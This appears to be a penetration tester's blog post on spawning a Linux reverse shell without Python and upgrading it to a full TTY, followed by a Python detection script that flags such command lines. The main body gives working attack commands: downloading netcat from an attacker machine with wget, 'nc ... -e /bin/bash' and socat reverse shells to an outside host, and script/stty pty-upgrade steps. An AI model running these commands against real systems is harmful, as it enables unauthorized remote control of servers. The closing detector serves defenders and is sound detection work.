Innogen security

Linux reverse shell without python.

During a recent engagement, an application exploit landed in an interactive shell, and the usual path of spawning a reverse shell and upgrading it to a TTY was sought.

It turned out that the go-to tools such as python, php, socat and ruby were unavailable on the target, so the following steps were taken to spawn the reverse shell and upgrade it to a TTY:

(screenshot: web shell)

First of all, if you do not wish to go through the hassle of the longer route to a TTY with bash completion etc., then merely fire the following command into the pseudo-terminal:

/usr/bin/script -qc /bin/bash /dev/null

Then press Ctrl+Z and execute:

stty raw -echo; fg; reset

This breaks you out of the pseudo-terminal into a TTY shell, from which you can su and run all other terminal-based commands. For those who need to jump through a couple of extra hoops to obtain a TTY shell because the above does not work 100% of the time, one of many ways to do it is below.

Copy over nc and spawn a shell

Using wget and Python's SimpleHTTPServer module, nc was easily moved over to the target:

Target server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
Target server: ./nc 10.x.x.x 9998 -e /bin/bash
Attacking machine: cp /usr/bin/nc .; python -m SimpleHTTPServer 9998
Attacking machine: nc -nlvp 9998

Break out of pseudo shell and upgrade to a tty shell

To upgrade our shell we first need to break out of the pseudo-shell we are in, which means getting a pty shell. Generally I would default to trusty python for this:

python -c 'import pty; pty.spawn("/bin/bash")'

or socat:

Attacking machine: socat file:`tty`,raw,echo=0 tcp-listen:9998
Target server: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998

As neither of our preferred tools was available, we can fall back on a simpler, and seemingly long-forgotten, way of upgrading: script.

On our attacking machine, which has caught the reverse nc shell, we can simply break out of the pseudo-shell using the following command:

Attacking machine: /usr/bin/script -qc /bin/bash /dev/null

(screenshot: pty shell)

All that is left is to do the following:

A: Ctrl+Z to background the shell

B: paste or type the following into the terminal on the attacking machine:

stty raw -echo; fg; reset

(screenshot: tty shell)

Now you have a fully interactive shell with autocomplete and can continue to exploit the server, including running su or local ssh commands on it.
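The commands this post relies on (script -qc with the typescript sent to /dev/null, stty raw -echo, nc -e, pty.spawn, and socat exec with a pty) are also what a defender would want to spot in process telemetry. The following is an added detection heuristic written for this page, not code from the original post: it runs over process command lines such as an auditd EXECVE record or an EDR agent would capture and returns why each one looks like a pty-upgrade or reverse-shell step. The sample command lines and the 192.0.2.10 address are constructed for the example.

```python
import re
import shlex

# Shell binaries whose launch via script/nc/socat is the signal we look for.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

# Constructed sample command lines (not from the original post): the first five
# mirror the steps the post describes, the last three are benign look-alikes.
SAMPLE_CMDLINES = [
    "/usr/bin/script -qc /bin/bash /dev/null",
    "stty raw -echo",
    "./nc 192.0.2.10 9998 -e /bin/bash",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:9998",
    "script -q session.log",
    "nc -z 192.0.2.10 443",
    "ls -la /tmp",
]


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _is_shell(token):
    return _basename(token) in SHELLS


def flag_command(cmdline):
    """Return the reasons one command line looks like a pty-upgrade or
    reverse-shell step; an empty list means nothing matched."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        argv = cmdline.split()
    if not argv:
        return []
    prog, args = _basename(argv[0]), argv[1:]
    reasons = []

    if prog == "script":
        # script -c <shell> allocates a pty; logging to /dev/null discards the typescript
        for i, a in enumerate(args):
            if (a.startswith("-") and "c" in a.lstrip("-")
                    and i + 1 < len(args) and _is_shell(args[i + 1])):
                if "/dev/null" in args:
                    reasons.append("script allocates pty for shell, typescript discarded")
                else:
                    reasons.append("script allocates pty for shell")
    elif prog == "stty" and "raw" in args and "-echo" in args:
        reasons.append("stty raw -echo: terminal set up for interactive pty upgrade")
    elif prog in {"nc", "ncat", "netcat"}:
        # -e/--exec (and ncat's -c/--sh-exec) hand the connection to a program
        for i, a in enumerate(args):
            if (a in {"-e", "--exec", "-c", "--sh-exec"}
                    and i + 1 < len(args) and _is_shell(args[i + 1])):
                reasons.append("netcat executes a shell on connection")
    elif prog.startswith("python"):
        if re.search(r"\bpty\.(spawn|fork)\b", " ".join(args)):
            reasons.append("python pty module used to allocate a pty")
    elif prog == "socat":
        joined = " ".join(args)
        if re.search(r"exec:[^,\s]*\b(?:sh|bash|dash|zsh)\b", joined) and ",pty" in joined:
            reasons.append("socat exec of a shell with a pty")
    return reasons


def scan(cmdlines):
    """Map each flagged command line to its reasons; unflagged lines are omitted."""
    hits = {}
    for line in cmdlines:
        reasons = flag_command(line)
        if reasons:
            hits[line] = reasons
    return hits


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_CMDLINES).items():
        print(f"{line!r}: {'; '.join(reasons)}")
```

The check is deliberately keyed on argument structure rather than on the bare program name, so that ordinary uses of script (keeping a typescript) and nc (a port check) are left alone; it is a heuristic, and a real deployment would feed it the parsed argv from the audit source instead of reparsing a joined string.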

Granted, there are many more ways to achieve the same shell, but using script seems to be overlooked quite often, hence this post.

Posted 19 Sep 2019